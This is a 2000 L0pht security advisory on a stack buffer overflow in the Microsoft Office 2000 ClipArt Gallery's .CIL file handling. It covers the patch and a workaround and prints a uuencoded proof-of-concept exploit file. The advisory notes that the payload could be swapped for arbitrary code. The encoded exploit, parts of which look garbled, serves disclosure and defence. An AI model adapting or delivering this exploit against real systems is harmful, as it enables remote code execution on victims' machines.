@Stake Inc. L0pht Research Labs www.atstake.com www.L0pht.com Security Advisory Advisory Name: ClipArt Gallery Overflow Advisory Released: 03/06/00 Application: Microsoft Office 2000 Severity: An attacker can seize control of a Windows 95, 98, NT, or 2000 machine via any HTML source, including Microsoft Outlook e-mail. Status: Vendor patch available, workaround available Author: dildog@l0pht.com WWW: http://www.l0pht.com/advisories.html Overview: ClipArt Gallery (CAG.EXE) that comes with Microsoft Office 2000 processes ".CIL" files for installation of clipart from the Internet. The CIL format is not handled properly by CAG.EXE and one of the internal fields in the file presents a buffer overflow condition, allowing arbitrary code to be executed by an attacker. The attacker would place a malicious CIL file on a website, or in an email, causing the target to import the CIL file. The file will be opened without prompting as the CIL file format does not require confirmation for open after download. This issue requires NO active scripting to exploit, and is NOT regulated by Internet Explorer 'security zones'. Description: The ".CIL" file format is a compressed clip-art delivery format that takes a Windows Metafile (WMF) or other image, stores it compressed, and packages it with keywords and descriptive information. Amongst the various fields in the CIL format are a few Unicode strings, one of which is the filename to which the clipart is to be decompressed. If the filename specified is extremely long, a stack overflow occurs after a Unicode to ANSI conversion, copying the ANSI version of the buffer over the stack frame. Unfortunately, the current fix for this issue is really only a bandaid to the problem that Internet Explorer is used -for everything- nowadays and that its HTML parser allows random file formats to be downloaded and parsed without confirmation in a number of cases. One can expect to see similar issues to this in the future. Vendor provided fix: Get your patch here: http://www.microsoft.com/technet/security/bulletin/ms00-015.asp Quick solution: One may wish to go through all of the file type associations and turn on the 'Confirm Open After Download' checkbox to ensure that suspect file types are not automatically executed without user intervention. To do this in Windows 2000, open up a standard Explorer window (such as My Computer), and go to the Tools menu and choose "Folder Options". Under the "File Types" tab, go to the "CIL" file type and click on it. Now press the "Advanced" button. You will notice that the checkbox "Confirm Open After Download" is unchecked. Check it, and then click OK. Exploit: This CIL file will create a harmless registry key when opened. The registry key location is: HKLM\Software\Microsoft\Windows:dword,SMACK!=0x00000001 This is proof of concept code only, but theoretically could be any executable code desired. This code works only on Windows 2000, but shifting around a few offsets yields code that works under Windows NT 4.0 and Win9X. <--- cut here ---> begin 644 nt5.cil M4P!0`$P`20!4`$,`20!,`#,```"T$```U\W&F@``XO_B__H+^@M>`@````!/ M50$`"0```T\(```#`#P!``````4````,`ML+VPL%````"P(`````!`````4! M`0`$````!`$-``0````&`0$`!`````(!`@`%`````0+___\`!````"X!&``( M````^@(`````````````!````"T!```%`````0+___\`!P```/P"```````` M```$````+0$!``@```#Z`@```0`!```````$````+0$"``0```#P`0``.`$` M`"0#F@"=`H@!:@./`8@#AP&]`ZP!M`.2`:L#D@&/`W(!8P-^`;D"70'P`C@! M3@,``;$#T0`7!*@`@`2(`.L$<`!7!6$`Q059`.`%60#_!5D`_P4``(T%`P`= M!0X`K@0B`$$$/@#6`V$`;@.-``H#P`"J`OH`3@([`?@!@P&G`=$!7`$F`A`T<%\@-I!04$B04>!+8%&P3'!1T$U@4F!.`%X`7@!>`% MOP/3!;\#MP7&`Y0%VP.*!>,#!?L$&P7K!`X%R`3Z!+L$\`2>!,@$=@1_!%8$3`0L!"$$*@0#!"$$W@/> M`T,#U`,F`\(#Y0*Y`XD"X`-K`NP#60(*!'$"(`1E`EX$8`),!7\"3@6*`D$% MD0*#!'\"7@1@`B$$90):!*`"4`6G`F4%FP)L!7\"X`6'`N`%_P$J!)4!#@1O M`14$6P&S`V0!OP.'`;H#CP&T`Y(!O0.L`;\#GP'9`Z,!&`3F`04$\@'U`^$! MY`/6``%X`6_`],%OP.W!<8#E`7;`XH%XP-S M!>P#7`4$!$T%'00\!3<$,`66!"4%K`0M!=T$-07L!$\%^@1?!1T%;`5!!7`% M405>!4L%505(!4`%1`4W!3L%+@4S!1@%+@4+!1X%^P0;!>L$#@7(!/H$NP3P M!)X$R`1V!'\$5@1,!"P$(00J!`,$(03>`]X#0P/4`R8#P@/E`KD#B0+@`VL" M[`-9`@H$<0(@!&4"7@1@`DP%?P).!8H"0061`H,$?P)>!&`"(01E`EH$H`)0 M!:<"906;`FP%?P+@!8<"X`7_`2H$E0$.!&\!%01;`;,#9`&_`XG`P@'X0/W M!B($]P9L!/<&L`3P!LP$YP;J!-P&#`7.!A$%Q`8`%:`?@!5H'R@5L!Y8%E``Z8'3@.L!]4"IP>S`J,'J0+'!ZL"S`?%`J<'LP*L!]4"T`?T`N('YP+@ M!Z`"G`BS`NP(N0+G"*`"D0B=`MD'=`+`!WH"F@=U`HH'7P)^!U`"6P=!`B\' M0@(8!RP"[@8\`O\%!`+_!8D""````/H"```(``@```````0````M`0``!``` M`/`!`@".````)0-%`/\%B0+1!J("W`;'`O0&V0(^!_,".P<-`Q@'IP,(!^$# M]P8B!/<&;`3W!K`$\`;,!.<&Z@3@8K!8@&"@6%!NX$C`;&!(\&DP2%!FH$?`8O!&<& M#01L!@`$;`;L`TP&Q@/_!;X#_P7@!6@'X`5:!\H%;`>6!90')`6C!\`$N@<6 M!+D'W@.F!TX#K`?5`J<'LP*C!ZD"QP>K`LP'Q0*G![,"K`?5`M`']`+B!^<" MX`>@`IP(LP+L"+D"YPB@`I$(G0+9!W0"P`=Z`IH'=0**!U\"?@=0`EL'00(O M!T("&`!A0`30!,@+#075"WT%V@O\!8X+_`6."^`%B@N(!7X+&P5I"[`$3`M&!"<+WP/Z M"GL#Q@H:`XL*O@))"F8"``H5`K()R`%="8(!!`E#`:8("@%$"-D`W@>P`'8' MC@`,!W0`H`9C`#(&6@#_!5D`"````/H"```(``@```````0````M`0``!``` M`/`!`@!@````)0,N`/\%60#_!0``;@8&`-X&%`!-!RH`N0=(`",(;@"*")P` M[0C1`$P)#@&F"5(!^PF<`4H*[`&3"D$"U0J<`A$+_`)%"V`#<@O'`Y<+,02T M"YX$R`L-!=4+?07:"_P%C@O\!8X+X`6*"X@%?@L;!6D+L`1,"T8$)PO?`_H* M>P/&"AH#BPJ^`DD*9@(`"A4"L@G(`5T)@@$$"4,!I@@*`40(V0#>![``=@>. M``P'=`"@!F,`,@9:`/\%60`(````^@(```$``0``````!````"T!`@`$```` M\`$``(P````D`T0`;P?\!?\%_`7_!90+\064"_$%V@LG!MH+EP;1"P8'P`MT M!Z<+X`>&"TD(70NN""P+$`GT"FT)M0K%"6\*&`HC"F4*T0FL"GD)[`H<"24+ MNPA6"U8(@`OM!Z(+@@>\"Q4'S@NE!M<+-0;:"_P%C@O\!8X+'@:&"XP&=POY M!E\+8P<_"\P'%PLR".@*E0BQ"O0("8P'GPE^ M!XP)>0<="7X'#0EZ!_,(?@??"($'D@B(!R<(A@?=!VL'-0=U!^,&<@>A!F@' M6`9W!R(&>0&"TD(70NN""P+$`GT"FT)M0K%"6\*&`HC"F4*T0FL"GD)[`H<"24+NPA6 M"U8(@`OM!Z(+@@>\"Q4'S@NE!M<+-0;:"_P%C@O\!8X+'@:&"XP&=POY!E\+ M8P<_"\P'%PLR".@*E0BQ"O0("8P'GPE^!XP) M>0<="7X'#0EZ!_,(?@??"($'D@B(!R<(A@?=!VL'-0=U!^,&<@>A!F@'6`9W M!R(&>0 dildog@l0pht.com [ For more advisories check out http://www.l0pht.com/advisories.html ] L-ZERO-P-H-T